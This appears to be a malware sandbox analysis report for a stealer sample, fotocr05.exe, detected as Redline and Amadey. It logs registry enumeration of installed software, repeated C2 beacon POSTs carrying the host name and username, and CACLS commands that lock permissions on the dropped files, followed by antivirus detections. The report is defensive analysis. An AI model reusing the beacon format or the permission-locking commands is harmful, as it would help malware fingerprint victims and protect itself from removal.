RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (12 events)

Time & API	Arguments	Status	Return
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA May 26, 2023, 9:13 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=6286bc&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\a9e2a16078" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "metado.exe" /P "test22:N"&&CACLS "metado.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
cmdline	CACLS "metado.exe" /P "test22:R" /E
cmdline	CACLS "metado.exe" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "metado.exe" /P "test22:N"&&CACLS "metado.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
cmdline	CACLS "..\a9e2a16078" /P "test22:N"

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Elastic	malicious (high confidence)
CAT-QuickHeal	Trojan.GenericFC.S30114712
ALYac	Gen:Variant.Ser.Zusy.4178
Malwarebytes	Malware.AI.3684324298
VIPRE	IL:Trojan.MSILZilla.24965
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.bd7c17
Cyren	W32/Kryptik.JKR.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	multiple detections
Cynet	Malicious (score: 99)
APEX	Malicious
ClamAV	Win.Trojan.Redline-9938775-1
Kaspersky	VHO:Trojan.Win32.Injuke.gen
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
Avast	Win32:CrypterX-gen [Trj]
Tencent	Trojan-Psw.Win32.Stealer.16000501
F-Secure	Heuristic.HEUR/AGEN.1307453
DrWeb	Trojan.PWS.StealerNET.125
McAfee-GW-Edition	BehavesLike.Win32.AgentTesla.bc
Trapmine	malicious.moderate.ml.score
Sophos	Generic ML PUA (PUA)
Ikarus	Trojan.Spy.Stealer
Jiangmin	TrojanDownloader.Deyma.apn
Avira	HEUR/AGEN.1307453
Gridinsoft	Trojan.Win32.Amadey.dg!se47453
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
GData	MSIL.Trojan-Stealer.Redline.G
Google	Detected
McAfee	AgentTesla-FCYU!435CCA4CA5A9
Rising	Trojan.Generic@AI.94 (RDML:mLkEE2YMzMzXKKeXKzNmdA)
SentinelOne	Static AI - Malicious SFX
Fortinet	MSIL/Agent.DFY!tr
AVG	Win32:CrypterX-gen [Trj]

fotocr05.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All